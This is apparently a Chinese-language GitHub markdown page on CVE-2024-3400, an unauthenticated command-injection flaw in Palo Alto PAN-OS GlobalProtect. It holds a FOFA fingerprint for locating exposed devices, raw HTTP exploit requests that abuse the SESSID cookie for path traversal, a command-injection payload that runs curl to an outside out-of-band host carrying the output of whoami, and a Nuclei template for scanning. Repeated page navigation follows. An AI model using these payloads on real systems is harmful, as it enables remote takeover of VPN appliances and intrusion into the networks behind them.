PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)

PAN-OS安全设备是PaloAlto公司的一款VPN设备，其使管理者无论位于何处都能够通过将下一代安全平台扩展到所有用户保护网络安全。它通过应用平台的功能来了解应用程序的使用情况。它将流量与用户和设备相关联并通过下一代技术实施安全策略来保护流量。其GlobalProtect功能的login.esp接口的Cookie存在未授权远程命令执行漏洞，攻击者可通过该漏洞控制设备。

fofa

icon_hash="-631559155"

poc

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Command Injection

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

CVE-2024-3400.yaml

id: palo-alto-networks-pan-os-command-injection
info:
  name: Palo Alto Networks PAN-OS Command Injection Vulnerability
  author: generated with pdteam AI
  severity: Critical

http:
  - method: POST
    path:
      - "{{BaseURL}}/ssl-vpn/hipreport.esp"
    headers:
      Cookie: "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;"
      Connection: "close"
      Content-Type: "application/x-www-form-urlencoded"
      Content-Length: "0"
    matchers:
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/global-protect/portal/images/poc.txt"
    matchers:
      - type: status
        status:
          - 403

漏洞来源

https://github.com/h4x0r-dz/CVE-2024-3400

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md

PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md

PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)

fofa

poc

Command Injection

CVE-2024-3400.yaml

漏洞来源

Files

PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md

Latest commit

History

PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md

File metadata and controls

PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)

fofa

poc

Command Injection

CVE-2024-3400.yaml

漏洞来源